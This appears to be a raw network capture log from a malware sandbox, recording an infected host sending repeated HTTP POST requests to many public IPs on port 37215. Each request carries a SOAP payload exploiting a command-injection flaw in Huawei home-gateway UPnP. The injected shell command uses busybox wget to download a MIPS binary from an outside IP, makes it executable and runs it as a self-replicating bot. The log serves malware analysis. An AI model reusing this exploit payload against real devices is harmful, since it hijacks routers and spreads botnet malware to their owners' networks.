2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2366192.168.2.1341226156.42.36.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786264896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2367192.168.2.135639041.197.95.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786281109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2368192.168.2.1348790197.154.245.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786303043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2369192.168.2.1348112197.189.189.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786659002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2370192.168.2.1344460197.245.127.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786669970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2371192.168.2.1336304157.120.68.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786690950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2372192.168.2.1356574157.59.152.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786735058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2373192.168.2.1345840206.238.212.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786799908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2374192.168.2.136091241.67.254.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786936998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2375192.168.2.135150241.199.147.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786957026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2376192.168.2.1337424157.127.120.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786974907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
